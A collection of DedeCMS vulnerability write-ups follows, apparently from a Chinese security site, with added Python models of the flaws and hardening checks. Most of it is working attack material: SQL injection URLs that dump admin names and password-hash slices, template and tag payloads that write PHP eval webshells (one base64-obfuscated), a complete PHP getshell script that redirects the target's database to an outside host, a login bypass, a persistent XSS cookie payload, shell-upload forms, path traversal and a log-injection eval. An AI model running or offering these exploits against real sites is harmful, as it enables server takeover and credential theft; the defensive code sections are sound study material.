Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
The injected array key breaks out of the query; updatexml() then makes MySQL return the admin user name and a 16-character slice of the password hash (MID(pwd,4,16)) inside its error message.
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a "software" item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php, a one-line eval shell with password xiao (eC5waHA decodes to x.php, the second string to <?php eval($_POST[xiao])?>baidu).
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
(%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 is the UTF-8 encoding of 涛声依旧, sent to a site that talks GBK to MySQL.)
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The sql parameter is executed as given; %23@__ is #@__, which the CMS replaces with the configured table prefix, so this selects the admin table.
DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and open the URL below. It triggers the XSS and installs the "XSS rootkit". Note that IE8/9 block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. Whichever of the URLs below you open afterwards, our XSS fires again: the decoded payload stores itself in a cookie named gotopage with a one-year expiry, and login.php reads gotopage from that cookie as readily as from the query string.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache    aid=2 shellpath= /    aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];   // target host name (also used as the Host header)
$aid  = $argv[2];   // which prepared mytag row on the attacker's database to load
$path = $argv[3];   // sub-directory the site lives in
$exp  = Getshell($url, $aid, $path);
// Getshell() returns the HTTP status line; in "HTTP/1.1 200 OK" the "OK" sits at offset 13
if (strpos($exp, "OK") > 12) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = "80";
    // _COOKIE[GLOBALS][cfg_db*] overwrite the database settings, so mytag_js.php
    // reads the tag body (and the PHP inside it) from the attacker-controlled MySQL server
    $content  = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return "";
    }
    fwrite($ock, $data);
    $exp = fgets($ock, 1024);   // first line of the response, i.e. the status line
    fclose($ock);
    return $exp;
}
?>
DedeCms v5.6-5.7 privilege bypass vulnerability (straight into the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug to the current captcha value and you land directly in the backend. The _POST[GLOBALS][cfg_db*] parameters point the login at a database you control, so admin/inimda is checked against your table rather than the site's.
Precondition: you must know the backend directory (织梦网站后台 in the URL stands for it).
Dedecms (织梦) tag remote file write vulnerability
Prerequisite: have your own DedeCMS database ready, then insert this row (the fwrite() payload string is empty as posted):
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell appears as 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// called on submit: point the form at the mytag_js.php URL entered in the first field
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
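The login bypass, the mytag_js.php getshell script and the form above all rely on the same thing: the CMS copies every request key into a global variable, in the order _GET, _POST, _COOKIE, so a key named _POST or _COOKIE overwrites the array that is walked in the next round and a nested GLOBALS key then overwrites the database settings. The gotopage cookie in the XSS section rides the same loop. The following is an added example, a Python reconstruction of that loop and of the key filter patched versions apply, not DedeCMS source; the default configuration values are assumed.

```python
"""Model of the request-variable extraction behind the _POST[GLOBALS][...] and
_COOKIE[GLOBALS][...] payloads on this page. Added example: a Python
reconstruction of the loop and of the key filter patched versions added, not
DedeCMS source. Default config values below are assumed."""
import re
from urllib.parse import parse_qsl


def php_parse_qs(qs: str) -> dict:
    """Parse a query string into nested dicts the way PHP does with bracket
    keys: a[b][c]=1 -> {'a': {'b': {'c': '1'}}}; a[]=1 appends a numeric key."""
    root = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)((?:\[[^\]]*\])*)", key)
        if not m:
            root[key] = value
            continue
        parts = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = root
        for part in parts[:-1]:
            part = part or str(len(node))
            node = node.setdefault(part, {})
        node[parts[-1] or str(len(node))] = value
    return root


# shape of the filter patched DedeCMS versions apply to every request key
BANNED = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def dede_register_globals(get: dict, post: dict, cookie: dict, hardened: bool = False) -> dict:
    """register_globals emulation: every key in $_GET, $_POST and $_COOKIE
    becomes a global, in that order. `table` stands in for PHP's global
    symbol table; a write to the key GLOBALS is modelled as a merge into it
    (PHP before 8.1 allowed writing $GLOBALS)."""
    table = {"cfg_dbhost": "localhost", "cfg_dbuser": "dede", "cfg_dbprefix": "dede_",
             "_GET": get, "_POST": post, "_COOKIE": cookie}
    for source in ("_GET", "_POST", "_COOKIE"):
        # re-read on each round: a $_POST['_COOKIE'] written in the previous
        # round is the array walked now, which is the whole trick
        for key, value in list(table[source].items()):
            if hardened and BANNED.match(key):
                raise ValueError("Request var not allow!")
            if key == "GLOBALS" and isinstance(value, dict):
                table.update(value)
            else:
                table[key] = value
    return table


if __name__ == "__main__":
    get = php_parse_qs("dopost=login&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90")
    print(dede_register_globals(get, {}, {})["cfg_dbhost"])       # attacker's database
    post = php_parse_qs("nocache=true&_COOKIE[GLOBALS][cfg_dbhost]=184.105.174.114")
    print(dede_register_globals({}, post, {})["cfg_dbhost"])
    print(dede_register_globals({}, {}, {"gotopage": '"><script>'})["gotopage"])  # cookie becomes $gotopage
    try:
        dede_register_globals(get, {}, {}, hardened=True)
    except ValueError as e:
        print(e)
```

With `hardened=True` the first offending key aborts the request before anything is overwritten; the real fix is to stop emulating register_globals altogether and read configuration only from the config file.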
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg
Template content (prefix it with gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">Content</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;><img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>
Submit; a "modified successfully" message means the template path has been changed.
3. Open the modified article. If its aid is 2, request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written into the plus directory.
DEDECMS web content management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>
Build the form above; after the upload the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
DedeCms (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The oldface path is not confined to the member's own upload directory, so ../ sequences reach files outside it; here the member template logo is deleted.
DedeCms (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
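The templet, oldface and code parameters above are all the same defect: a user-supplied path is joined to a base directory without checking where it ends up. The following is an added example, not DedeCMS code: one containment check, tested against the three payloads from this page on a site layout constructed in a temporary directory. Column names and directory names are assumed.

```python
"""Path containment check for the file-path parameters abused above
(templet, oldface, code). Added example, not DedeCMS code; the directory
layout is constructed in a temporary directory for the demonstration."""
import os
import tempfile


def contained_path(root, user_path, jail=None, allowed_ext=None):
    """Resolve user_path relative to root and return the real path only if it
    stays inside jail (default: root) and has an allowed extension.
    realpath() collapses '..' and symlinks before the comparison, so
    /uploads/userup/8/../../../member/... is judged by the file it actually
    names, not by the string the user sent."""
    root = os.path.realpath(root)
    jail = os.path.realpath(jail) if jail else root
    candidate = os.path.realpath(os.path.join(root, user_path.lstrip("/\\")))
    if os.path.commonpath([jail, candidate]) != jail:
        raise ValueError(f"{user_path!r} resolves outside {jail}")
    if allowed_ext and os.path.splitext(candidate)[1].lower() not in allowed_ext:
        raise ValueError(f"{user_path!r} has a disallowed extension")
    return candidate


def make_layout():
    """Constructed site layout: templates, two members' upload directories,
    the member template images the delete payload targets, plus/carbuyaction."""
    base = tempfile.mkdtemp(prefix="dede_")
    dirs = {
        "root": base,
        "templets": os.path.join(base, "templets"),
        "userup8": os.path.join(base, "uploads", "userup", "8"),
        "userup3": os.path.join(base, "uploads", "userup", "3"),
        "member_images": os.path.join(base, "member", "templets", "images"),
        "carbuy": os.path.join(base, "plus", "carbuyaction"),
    }
    for d in dirs.values():
        os.makedirs(d, exist_ok=True)
    for rel in ("templets/article.htm", "uploads/userup/3/1.gif",
                "uploads/userup/8/face.jpg", "member/templets/images/m_logo.gif"):
        open(os.path.join(base, rel), "w").close()
    return dirs


def check(fn, *args, **kwargs):
    """Run a lookup and report 'allowed' or 'blocked'."""
    try:
        fn(*args, **kwargs)
        return "allowed"
    except ValueError:
        return "blocked"


if __name__ == "__main__":
    layout = make_layout()
    # templet: a member's article template must be a real template file
    print(check(contained_path, layout["templets"], "article.htm", allowed_ext={".htm"}))
    print(check(contained_path, layout["templets"], "../uploads/userup/3/1.gif", allowed_ext={".htm"}))
    # oldface: a site-relative path that must stay in the member's own directory
    print(check(contained_path, layout["root"],
                "/uploads/userup/8/../../../member/templets/images/m_logo.gif", jail=layout["userup8"]))
    # code: an include name that must stay inside plus/carbuyaction
    print(check(contained_path, layout["carbuy"], "../../"))
```

The extension allow-list is what defeats the gif89a trick in the template sections: a file under uploads/ never qualifies as a template, whatever its magic bytes say, and the jail check is what stops the delete and include payloads.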
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability (same issue as above)
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The pwd column holds the 32-character MD5 with its first 5 and last 7 characters removed, a 20-character value. Strip 3 more characters from the front and 1 from the end to get the usual 16-character MD5.
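The following is an added example, not DedeCMS code, tying the password note above to the rss.php payload at the top of the page: the #@__ prefix expansion, the 32 -> 20 -> 16 character conversions, and why MID(pwd,4,16) on the stored value is exactly the 16-character MD5 that hash tables index. The word list is constructed.

```python
"""How the dede_admin.pwd value relates to a normal MD5, and why the rss.php
payload asks for MID(pwd,4,16). Added example, not DedeCMS code; the
word list is constructed."""
import hashlib


def expand_prefix(sql: str, prefix: str = "dede_") -> str:
    """The #@__ placeholder in DedeCMS SQL is replaced by the configured
    table prefix, so `#@__admin` becomes `dede_admin`."""
    return sql.replace("#@__", prefix)


def dede_pwd20(md5hex: str) -> str:
    """32-char MD5 -> the 20-char form stored in dede_admin.pwd
    (first 5 and last 7 characters dropped)."""
    return md5hex[5:25]


def pwd20_to_md5_16(pwd20: str) -> str:
    """20-char form -> the common 16-char MD5 (3 more dropped in front, 1 at
    the end). This is md5[8:24], the slice most hash tables index."""
    return pwd20[3:19]


def sql_mid(value: str, pos: int, length: int) -> str:
    """MySQL MID(str, pos, len) with 1-based pos, as used in the rss.php
    payload: MID(pwd,4,16) on the 20-char value is exactly the 16-char MD5."""
    return value[pos - 1:pos - 1 + length]


def md5_16(plaintext: str) -> str:
    """16-char MD5 of a candidate password, for comparison with the leak."""
    return hashlib.md5(plaintext.encode()).hexdigest()[8:24]


def crack_pwd20(pwd20: str, wordlist):
    """Offline check of a leaked 20-char value against candidate passwords."""
    target = pwd20_to_md5_16(pwd20)
    for word in wordlist:
        if md5_16(word) == target:
            return word
    return None


if __name__ == "__main__":
    full = hashlib.md5(b"admin").hexdigest()
    stored = dede_pwd20(full)
    print(expand_prefix("SELECT * FROM `#@__admin`"))
    print(full, "->", stored, "->", pwd20_to_md5_16(stored))
    print("MID(pwd,4,16) ==", sql_mid(stored, 4, 16))
    print("cracked:", crack_pwd20(stored, ["123456", "password", "admin"]))
```

Unsalted MD5 in any of these forms is a single lookup away from the plaintext; a leaked pwd column is equivalent to a leaked password.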
DedeCms (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCms (织梦) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCms (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It combines a MySQL numeric overflow, which forces a database error, with the fact that DEDECMS records database errors in a PHP file whose header is never validated.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
(the leading int(3) is the output of our var_dump(3), so the PHP placed after */ was executed)
3. Open test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.
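What goes wrong in step 2 is log injection into a file with a .php extension: each error is appended inside a PHP block comment, and request data containing */ closes that comment early. The following is an added example, not DedeCMS code, modelling the write and the check that makes it safe. The exact entry layout is assumed (the request URI is included because the int(3) shown above proves the mid= value reached the file), and the request URI is constructed since the page's own URL is truncated.

```python
"""Model of the data/mysql_error_trace.php write that digg_frame.php abuses:
each error is appended inside a PHP block comment, and request data that
contains */ closes that comment early. Added example, not DedeCMS code; the
entry layout is assumed and the request URI in __main__ is constructed."""

OPEN, TRAILER = "<?php /*", "*/ ?>"


def write_trace_vulnerable(uri: str, error: str, sql: str) -> str:
    """Raw interpolation: whatever the attacker put in the URL goes in as-is."""
    return f"{OPEN}\nURI: {uri}\nError: {error}\nError sql: {sql}; {TRAILER}\n"


def neutralise(text: str) -> str:
    """Make user data inert inside a /* */ comment by breaking every '*/'.
    ('?>' needs no treatment: it does not end PHP mode inside a block comment.)"""
    return text.replace("*/", "*\\/")


def write_trace_hardened(uri: str, error: str, sql: str) -> str:
    """Same entry, but nothing user-controlled can terminate the comment.
    Better still: log to a non-.php file outside the web root."""
    return (f"{OPEN}\nURI: {neutralise(uri)}\nError: {neutralise(error)}\n"
            f"Error sql: {neutralise(sql)}; {TRAILER}\n")


def comment_escapes(entry: str) -> bool:
    """True when a '*/' appears before the entry's own trailer, i.e. PHP
    would leave the comment and execute what follows."""
    body = entry[len(OPEN):]
    first = body.find("*/")
    return first != -1 and first < body.rfind("*/")


def executed_code(entry: str):
    """Return the text PHP would execute after an early '*/', or None."""
    if not comment_escapes(entry):
        return None
    body = entry[len(OPEN):]
    start = body.find("*/") + 2
    end = body.find("?>", start)
    return body[start:end if end != -1 else None].strip()


if __name__ == "__main__":
    # constructed request; the page's own URL is truncated
    uri = "/plus/digg_frame.php?id=1024e1024&mid=*/eval($_POST[x]);var_dump(3);?>"
    err = "Illegal double '1024e1024' value found during parsing"
    sql = "Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1"
    for writer in (write_trace_vulnerable, write_trace_hardened):
        entry = writer(uri, err, sql)
        print(writer.__name__, "->", comment_escapes(entry), executed_code(entry))
```

The vulnerable entry yields `eval($_POST[x]);var_dump(3);` as executable code, which is exactly what the `int(3)` in step 2 shows; the hardened entry still records the attacker's string, but only as comment text.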
DedeCms (织梦) plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
The %cf before the quote is a GBK lead byte: on a GBK connection it pairs with the backslash that the escaping routine inserts, so the quote survives unescaped.
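Both the "GBK SQL injection" section near the top and the %cf' payload just above depend on the wide-byte mechanism: byte-wise escaping puts a backslash (0x5C) after a dangling GBK lead byte, MySQL reads the pair as one character, and the quote is free again. The following is an added example, not DedeCMS code: a Python model of PHP's addslashes(), of how a GBK-collated connection tokenises the result, and of the strict-decoding check that refuses such input. Table and column names are assumed.

```python
"""Wide-byte escape bypass behind "GBK injection", as a Python model.
Added example, not DedeCMS code. addslashes() mirrors PHP's function;
gbk_tokens() splits bytes the way a GBK-collated MySQL connection does."""


def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): a backslash before ' " \\ and NUL, byte by byte,
    with no idea which bytes belong to a multibyte character."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def gbk_tokens(data: bytes) -> list:
    """Split bytes into GBK characters: lead byte 0x81-0xFE followed by a
    trail byte 0x40-0xFE (except 0x7F) is one two-byte character; anything
    else is a single byte. 0x5C (backslash) is a valid trail byte."""
    tokens, i = [], 0
    while i < len(data):
        lead = data[i]
        if 0x81 <= lead <= 0xFE and i + 1 < len(data):
            trail = data[i + 1]
            if 0x40 <= trail <= 0xFE and trail != 0x7F:
                tokens.append(data[i:i + 2])
                i += 2
                continue
        tokens.append(data[i:i + 1])
        i += 1
    return tokens


def has_unescaped_quote(escaped: bytes) -> bool:
    """True when a GBK-aware parser sees a single quote that is not preceded
    by a backslash token: the escaping produced by addslashes() is gone."""
    tokens = gbk_tokens(escaped)
    for idx, tok in enumerate(tokens):
        if tok == b"'" and (idx == 0 or tokens[idx - 1] != b"\\"):
            return True
    return False


def build_query(uid: bytes) -> bytes:
    """The vulnerable pattern: byte-wise escaping pasted into a query that
    MySQL will read as GBK. Table and column names are assumed."""
    return b"SELECT * FROM dede_member WHERE userid='" + addslashes(uid) + b"'"


def strict_decode(data: bytes, charset: str = "gbk") -> str:
    """Hardened handling: decode input strictly in the connection charset
    before it goes anywhere near a query. A dangling lead byte such as 0xCF
    followed by a quote is not valid GBK and is rejected, so the backslash
    can never be absorbed. Use parameterised queries as well."""
    return data.decode(charset)  # raises UnicodeDecodeError on malformed input


if __name__ == "__main__":
    probe = b"\xcf' union select 1,2,userid,4,pwd,6 from dede_admin/*"
    print(build_query(probe))
    print("escaping defeated:", has_unescaped_quote(addslashes(probe)))
    print("plain quote still escaped:", has_unescaped_quote(addslashes(b"abc'")))
    try:
        strict_decode(probe)
    except UnicodeDecodeError as e:
        print("rejected:", e)
```

Setting the connection charset properly (so that the escaping routine is charset-aware) and binding parameters instead of splicing strings closes the same hole without the explicit decode step.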